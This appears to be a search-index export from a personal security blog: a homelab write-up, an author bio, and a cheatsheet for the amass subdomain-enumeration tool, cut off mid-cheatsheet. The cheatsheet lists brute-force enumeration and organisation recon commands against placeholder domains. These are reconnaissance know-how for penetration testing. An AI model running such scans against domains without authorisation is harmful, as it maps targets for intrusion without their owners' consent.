[{"content":"Like a lot of people, it started with YouTube and TikTok. I kept seeing videos about homelabs, what people were running, what it could do, why they built one, and it slowly pulled me in.\nFor me it came down to three things.\nFirst, security. I have a cybersecurity background, currently working toward a BS in cybersecurity, and my day job leans heavily on the sysadmin side with a security emphasis. But the work can get stagnant. Limited scope, slow technology adoption, not a lot of room to experiment. A homelab fixes that. It gives me a sandbox where I can actually try things without waiting for an approval process.\nSecond, learning. I wanted hands-on experience with tools and technologies I wasn\u0026rsquo;t getting exposure to at work. Reading about something and actually running it are very different things.\nThird, and honestly this one might be the most relatable, subscriptions. Everything is a subscription now. Cloud storage, media streaming, VPN, backup services. It adds up fast and you own nothing. I wanted to change that.\nThere was also a fourth reason, and it came out of nowhere. My router/modem combo decided to die around the same time I was going down the homelab rabbit hole. I called customer service and was told my device was outdated and that I needed to either rent their router or buy a compatible one. The modem would be free as long as I stayed with them, but the router was a rental. That didn\u0026rsquo;t sit right with me. If I was going to replace my networking gear anyway, I figured I might as well invest in something proper instead of paying monthly for equipment I\u0026rsquo;d never own. That decision spiraled pretty quickly into everything else you\u0026rsquo;re about to read.\nThe only thing standing between me and getting started was money. I didn\u0026rsquo;t want to spend a bunch upfront before I even knew if I\u0026rsquo;d stick with it. Then tax season came through. I know I\u0026rsquo;m overpaying, don\u0026rsquo;t bug me about it. I like to think of my tax return as a nice surprise once a year. Some of that money went toward the homelab, and you\u0026rsquo;ll see what I mean once I introduce you to the setup and what it cost to get here.\nThe Hardware and Why I Chose Each Piece Once I decided I was going to replace my networking gear anyway, the question became what to replace it with. I was already familiar with TP-Link from my old router/modem combo, so I started looking into what else they made. That\u0026rsquo;s when I found Omada.\nOmada is TP-Link\u0026rsquo;s software-defined networking lineup, and once I saw what it offered I was sold. A built-in VPN server with client-to-site support, meaning I can access my home network securely from any device anywhere, centralized management of all network devices from one interface, and the ability to expand the setup as needed. The learning curve is steep if you\u0026rsquo;re new to networking. I have decent experience but had never touched SDNs before, so that was part of the appeal too.\nThe other thing that drove a lot of my decisions was the modem Spectrum provided. It has a 2.5 Gbps ethernet port, and once I saw that I wanted everything downstream to match. No point having a fast modem if your network gear is going to bottleneck it.\nHere\u0026rsquo;s what I ended up with on the networking side:\nTP-Link ER707-M2 — the router. Two 2.5 Gbps WAN ports plus six additional WAN/LAN ports. Handles routing, firewall, and the VPN server.\nSpec Detail WAN Ports 2x 2.5 Gbps LAN Ports 6x 1 Gbps WAN/LAN VPN WireGuard, OpenVPN, IPSec Management Omada SDN Other SPI Firewall, Load Balancing, Lightning Protection SG2210XMP-M2 — the switch. Eight 2.5 Gbps PoE+ ports and two SFP+ ports for future upgrades. The PoE+ is important, more on that in a second.\nSpec Detail PoE+ Ports 8x 2.5 Gbps Uplink Ports 2x 10G SFP+ PoE Budget 240W Management Omada SDN TP-Link EAP770 — WiFi 7 access point with a 2.5 Gbps uplink, managed through Omada like everything else.\nSpec Detail WiFi Standard WiFi 7 (802.11be) Max Speed BE11000 Tri-band Uplink 2.5 Gbps Power PoE+ Management Omada SDN I\u0026rsquo;d also be doing this section a disservice if I didn\u0026rsquo;t mention the device that started it all before the tax return came through. An old Acer Predator laptop, i7-7700HQ, 8 GB of RAM. Nothing special by today\u0026rsquo;s standards but it was what I had. Before I bought a single piece of equipment, that laptop was my testing ground. I installed Pi-hole on it, tried out different operating systems, broke things, fixed things, and figured out what I actually wanted to build. It was messy and unorganized but that\u0026rsquo;s kind of the point when you\u0026rsquo;re learning.\nIt\u0026rsquo;s still in the mix today. Once I got the Mini PC up and running Proxmox, I installed Proxmox on the laptop too and joined it to the same cluster. It now serves as a failover node. Not the most powerful machine in the stack, but it doesn\u0026rsquo;t need to be. If the Mini PC goes down for maintenance or something unexpected happens, the laptop is there to keep things running.\nSpec Detail Model Acer Predator Helios 300 G3-571 CPU Intel Core i7-7700HQ @ 2.80GHz (8 threads) RAM 8 GB Role Proxmox failover node For the server side, I wanted something small. I didn\u0026rsquo;t want a full rack or a loud tower sitting somewhere. I went with a Mini PC that punches well above its weight, 48 GB of RAM, dual 2.5 Gbps NICs, enough cores to run a bunch of VMs simultaneously, and a CPU with a low enough power draw that leaving it on 24/7 doesn\u0026rsquo;t hurt. It\u0026rsquo;s running Proxmox as the hypervisor, which lets me spin up and tear down virtual machines without touching the host.\nSpec Detail Model GMKtec K15 AI CPU Intel Core Ultra 5 125U RAM 48 GB DDR5 Storage 1 TB NVMe SSD Networking Dual 2.5 Gbps NICs Other OCuLink, USB4, HDMI 2.1 Role Proxmox hypervisor / primary compute I also picked up two Raspberry Pi 5s, 16 GB RAM each. Raspis are great for containerization and I wanted to learn Docker Swarm. They\u0026rsquo;re small, efficient, and more than capable of running a solid number of containers. Combined with the GeeekPi PoE+ NVMe hats I grabbed for each one, they\u0026rsquo;re powered directly from the switch over ethernet. No separate power bricks, no extra cables, just one ethernet cable each. That\u0026rsquo;s the PoE+ I mentioned.\nSpec Detail Model Raspberry Pi 5 x2 CPU Broadcom BCM2712, 4 cores @ 2.4GHz RAM 16 GB Storage SD card (NVMe upgrade planned) Power PoE+ via GeeekPi P33 hat Role Docker Swarm manager nodes Spec Detail Model GeeekPi P33 PoE+ NVMe Hat Power PoE+ (802.3at) Storage M.2 NVMe slot (2230/2242/2260/2280) Cooling Official Pi 5 active cooler mount For storage, I went with the UGREEN NASync DH4300 Plus. It was on discount, which was honestly the deciding factor. It supports up to 128 TB, has a 2.5 Gbps ethernet port, and runs its own OS with Docker support. I didn\u0026rsquo;t have the budget to buy proper NAS drives right away, so I\u0026rsquo;m currently running whatever spare hard drives I had laying around the house. It works, but it\u0026rsquo;s janky and I know it. Four 16 TB drives are on the list when the budget allows.\nSpec Detail Model UGREEN NASync DH4300 Plus Bays 4 Max Capacity 128 TB RAM 8 GB LPDDR4X Networking 2.5 Gbps ethernet OS UGOS Pro Current Drives 4x 16 TB Honestly, if I\u0026rsquo;m being transparent, most of my decision making came back to one thing. The modem had a 2.5 Gbps port and I wanted everything to match. Future-proofing by making it uniform throughout. Everything else kind of fell into place around that.\nThe Physical Setup (Honest Edition) If you were expecting a clean rack setup with velcro cable ties and perfect airflow, I\u0026rsquo;m sorry to disappoint. Everything lives in my TV stand.\nIt\u0026rsquo;s cluttered. I\u0026rsquo;ll be the first to admit it. I made an attempt at cable management and got about halfway there. The cables behind the TV stand are somewhat under control, but the top shelf is a different story. It is what it is for now.\nThe bigger concern heading into summer is heat. Everything is packed into an enclosed TV stand with limited airflow and I genuinely don\u0026rsquo;t know how the equipment is going to handle the warmer months. That\u0026rsquo;s something I need to figure out before it becomes a problem.\nThere\u0026rsquo;s also the matter of power. Right now everything is plugged into a single outlet. No UPS, no surge protection worth mentioning. One bad power fluctuation and I could be looking at fried equipment or corrupted NAS drives. A UPS is high on the list of things to address. It\u0026rsquo;s not a matter of if, it\u0026rsquo;s a matter of when.\nBasically, the physical setup works but it\u0026rsquo;s held together with good intentions and a little bit of luck. There\u0026rsquo;s room for improvement and I know it.\nWhat\u0026rsquo;s Actually Running on It This is where things get interesting. The homelab isn\u0026rsquo;t just sitting there looking pretty, it\u0026rsquo;s actually doing things.\nOn the virtualization side, Proxmox is running several VMs on the Mini PC. The first is an RHEL IDM server, which handles identity management for the lab. Think centralized user accounts and authentication, the same kind of setup you\u0026rsquo;d find in an enterprise environment. A redundant IDM server is in the works so there\u0026rsquo;s a failover if the first one goes down.\nThere are two VMs running Pi-hole with Unbound. Pi-hole handles network-wide ad blocking and Unbound sits behind it as a recursive DNS resolver, meaning DNS queries don\u0026rsquo;t get forwarded to a third party like Google or Cloudflare. They resolve directly from authoritative nameservers. Two instances means if one goes down for maintenance, the other keeps the network running without skipping a beat. It\u0026rsquo;s been working great.\nOne VM is dedicated to hosting the Omada SDN controller application. You can buy a physical Omada controller, but why spend the money when you can just spin up a VM and install the software? Same functionality, no extra hardware.\nThere\u0026rsquo;s also a Grafana VM for monitoring. Still a work in progress, but the goal is a unified dashboard pulling metrics from everything in the lab. A VM running OpenVAS Community Edition handles vulnerability scanning, which ties back to the security side of why I built this in the first place. It scans the network for known vulnerabilities and misconfigurations so I know what needs attention.\nFinally there\u0026rsquo;s an Ubuntu VM that\u0026rsquo;s part of a Docker Swarm cluster along with the two Raspberry Pi 5s. The Swarm is running a few things worth mentioning. STIG Manager for system hardening and security compliance, the arr stack for media self hosting (Jellyfin, Sonarr, Radarr, and Prowlarr if those mean anything to you), and Portainer as a management UI for the containers.\nOne more thing. There\u0026rsquo;s a VM running a Ghost and Nginx Proxy Manager Docker stack that\u0026rsquo;s hosting this very website. So if you\u0026rsquo;re reading this, you\u0026rsquo;re being served content straight from my TV stand. Make of that what you will.\nWhere It\u0026rsquo;s Going The dream is a proper enterprise grade server rack. Clean, organized, everything mounted and labeled. That\u0026rsquo;s not happening anytime soon though. I rent, so a full rack setup isn\u0026rsquo;t really an option right now. Maybe one day.\nIn the more immediate future, the priority is a UPS. Everything is still plugged into a single outlet and it\u0026rsquo;s been that way for about three months now. The 4x16 TB drives just arrived and I\u0026rsquo;ve already migrated the NAS. Still have zero power protection during the whole process. Not my brightest moment, but it worked out. A UPS is still happening though. The drives are in, the data is there, and one bad power event could ruin all of it. It\u0026rsquo;s next on the list.\nOn the hardware side, I want to build out a proper 4 node Raspberry Pi cluster using one of those DeskPi rack cases. Get a small switch that fits inside it, mount the Pis properly, and finally replace the SD cards with NVMe SSDs so the OS isn\u0026rsquo;t running on hardware that could fail without warning. I\u0026rsquo;d also like to get the Mini PC and NAS mounted in there and maybe pick up a second Mini PC so everything is uniform.\nLonger term, I want to build a dedicated server for running a local LLM at home. Paired with OpenClaw, a free and open source autonomous AI agent that runs on top of LLMs and uses messaging platforms as its main interface, the idea is to have a self hosted AI setup that doesn\u0026rsquo;t rely on any cloud services. Is it a need? Absolutely not. But it sounds like a fun project and that\u0026rsquo;s reason enough.\nThe homelab is a living thing. It grows, it changes, and it occasionally breaks at the worst possible time. That\u0026rsquo;s kind of the point. More updates to come.\n— d3vilsec\n","permalink":"https://d3vilsec.com/posts/homelab-2026/","summary":"\u003cp\u003eLike a lot of people, it started with YouTube and TikTok. I kept seeing videos about homelabs, what people were running, what it could do, why they built one, and it slowly pulled me in.\u003c/p\u003e\n\u003cp\u003eFor me it came down to three things.\u003c/p\u003e\n\u003cp\u003eFirst, security. I have a cybersecurity background, currently working toward a BS in cybersecurity, and my day job leans heavily on the sysadmin side with a security emphasis. But the work can get stagnant. Limited scope, slow technology adoption, not a lot of room to experiment. A homelab fixes that. It gives me a sandbox where I can actually try things without waiting for an approval process.\u003c/p\u003e","title":"My Homelab in 2026 — How It Started and What I'm Running"},{"content":"Marine veteran. IT professional. 8+ years of experience and most of it earned the hard way — in a fast-paced environment where you either adapt or fall behind. I got my start in the Corps as a Data Systems Administrator and haven\u0026rsquo;t stopped learning since.\nThese days I work as a sysadmin with my sights set on cybersecurity. Currently working toward a B.S. in Cybersecurity and Information Assurance while building out a homelab that\u0026rsquo;s taught me more than any classroom has.\nThis site is a knowledge base, a blog, and a personal portfolio rolled into one. I built it to document my work, share what I\u0026rsquo;ve learned, and maybe save someone else a few hours of troubleshooting. If you\u0026rsquo;re a beginner trying to figure out where to start, an IT professional looking to level up, or just someone who stumbled in from a search — there\u0026rsquo;s probably something here for you.\nEverything on this site is stuff I\u0026rsquo;ve actually built, broken, and fixed myself. No fluff.\n","permalink":"https://d3vilsec.com/about/","summary":"\u003cp\u003eMarine veteran. IT professional. 8+ years of experience and most of it earned the hard way — in a fast-paced environment where you either adapt or fall behind. I got my start in the Corps as a Data Systems Administrator and haven\u0026rsquo;t stopped learning since.\u003c/p\u003e\n\u003cp\u003eThese days I work as a sysadmin with my sights set on cybersecurity. Currently working toward a B.S. in Cybersecurity and Information Assurance while building out a homelab that\u0026rsquo;s taught me more than any classroom has.\u003c/p\u003e","title":"About"},{"content":"amass Cheatsheet Type: Actively maintained subdomain discovery — extensive data sources \u0026amp; tool integrations\nInstallation sudo apt install amass # or go install -v github.com/owasp-amass/amass/v4/...@master # or snap install amass Subcommands Subcommand Description enum Subdomain enumeration (main command) intel Collect intel about an organisation viz Visualise enumeration results track Track differences between enumerations db Interact with the graph database enum — Subdomain Enumeration # Basic passive enumeration amass enum -passive -d example.com # Active enumeration (DNS resolution + brute force) amass enum -active -d example.com # Active with brute force amass enum -brute -d example.com # Brute force with wordlist amass enum -brute -w wordlist.txt -d example.com # Multiple domains amass enum -d example.com -d example.org # Domains from file amass enum -df domains.txt # Limit data sources amass enum -passive -d example.com -src # Output to file amass enum -d example.com -o output.txt # Output to JSON amass enum -d example.com -json output.json # Show data sources in results amass enum -d example.com -src # Verbose amass enum -v -d example.com # Set timeout (minutes) amass enum -d example.com -timeout 30 # Use specific resolvers amass enum -d example.com -r 8.8.8.8,1.1.1.1 # Use resolver list amass enum -d example.com -rf resolvers.txt # Exclude data sources amass enum -d example.com -exclude CrtSearch # Only specific data sources amass enum -d example.com -include Wayback,CrtSearch Common Flags (enum) Flag Description -d \u0026lt;domain\u0026gt; Target domain -df \u0026lt;file\u0026gt; File with list of domains -passive Passive only (no DNS resolution) -active Active DNS (zone transfer, cert grabbing) -brute Enable brute force -w \u0026lt;wordlist\u0026gt; Wordlist for brute force -o \u0026lt;file\u0026gt; Output results to file -json \u0026lt;file\u0026gt; Output as JSON -src Show data source for each result -ip Show IP addresses -r \u0026lt;resolvers\u0026gt; Comma-separated resolver IPs -rf \u0026lt;file\u0026gt; File of resolver IPs -timeout \u0026lt;n\u0026gt; Timeout in minutes -v Verbose -config \u0026lt;file\u0026gt; Config file path -dir \u0026lt;path\u0026gt; Directory for output/database intel — Org Recon # Find domains by organisation name amass intel -org \u0026#34;Target Corp\u0026#34; # Reverse whois amass intel -whois -d example.com # ASN lookup amass intel -asn 12345 # Find domains from IP/CIDR amass intel -ip 192.168.1.0/24 # Find ASN from domain amass intel -d example.com -whois Configuration File Config file at ~/.config/amass/config.ini (or specify with -config):\n[resolvers] resolver = 8.8.8.8 resolver = 1.1.1.1 [bruteforce] enabled = true wordlist_file = /path/to/wordlist.txt recursive = true minimum_for_recursive = 1 [alterations] enabled = true [data_sources] # API keys for passive data sources [data_sources.Shodan] [data_sources.Shodan.Credentials] apikey = YOUR_KEY_HERE Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt # Amass also ships with its own wordlist: # /usr/share/amass/wordlists/ Example Full Run # Passive (fast, stealthy) amass enum -passive -d example.com -src -o passive_results.txt # Active + brute force (thorough) amass enum -active -brute \\ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ -d example.com \\ -src -ip \\ -json amass_results.json \\ -timeout 60 ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/amass/","summary":"\u003ch1 id=\"amass-cheatsheet\"\u003eamass Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Actively maintained subdomain discovery — extensive data sources \u0026amp; tool integrations\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install amass\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ego install -v github.com/owasp-amass/amass/v4/...@master\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnap install amass\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"subcommands\"\u003eSubcommands\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSubcommand\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eenum\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSubdomain enumeration (main command)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintel\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCollect intel about an organisation\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eviz\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVisualise enumeration results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003etrack\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTrack differences between enumerations\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edb\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInteract with the graph database\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"enum--subdomain-enumeration\"\u003eenum — Subdomain Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic passive enumeration\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -passive -d example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Active enumeration (DNS resolution + brute force)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -active -d example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Active with brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -brute -d example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with wordlist\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -brute -w wordlist.txt -d example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multiple domains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -d example.org\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Domains from file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -df domains.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Limit data sources\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -passive -d example.com -src\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -o output.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -json output.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Show data sources in results\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -src\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Verbose\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -v -d example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Set timeout (minutes)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -timeout \u003cspan style=\"color:#ae81ff\"\u003e30\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use specific resolvers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -r 8.8.8.8,1.1.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use resolver list\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -rf resolvers.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Exclude data sources\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -exclude CrtSearch\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Only specific data sources\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d example.com -include Wayback,CrtSearch\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags-enum\"\u003eCommon Flags (enum)\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-df \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFile with list of domains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-passive\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePassive only (no DNS resolution)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-active\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eActive DNS (zone transfer, cert grabbing)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-brute\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eEnable brute force\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist for brute force\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput results to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-json \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput as JSON\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-src\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow data source for each result\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ip\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow IP addresses\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r \u0026lt;resolvers\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eComma-separated resolver IPs\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-rf \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFile of resolver IPs\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-timeout \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTimeout in minutes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-config 